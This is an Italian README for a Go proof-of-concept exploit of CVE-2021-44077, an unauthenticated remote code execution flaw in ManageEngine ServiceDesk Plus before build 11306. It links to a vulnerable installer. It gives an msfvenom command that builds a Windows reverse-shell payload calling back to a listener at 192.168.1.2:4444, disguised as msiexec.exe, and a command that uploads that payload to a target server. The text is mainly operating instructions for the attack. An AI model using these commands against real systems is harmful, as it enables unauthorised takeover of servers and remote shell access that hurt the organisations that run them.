
Exploit Proof of Concept in Golang per CVE-2021-44077: RCE pre-autenticazione in ManageEngine ServiceDesk Plus < 11306
Questo exploit è una RCE non autenticata in Zoho ManageEngine ServiceDesk Plus < 11306.
Puoi trovare una versione vulnerabile del software qui: http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe
Non sono riuscito a trovare una versione Golang di questo, quindi eccola qui. Il mio codice non è eccezionale, quindi procedi a tuo rischio e pericolo.
Post del blog:
Crea un payload dannoso nella tua directory corrente.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe
Poi, esegui l'exploit.
go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"
-u è l'URL vulnerabile -f è il tuo file dannoso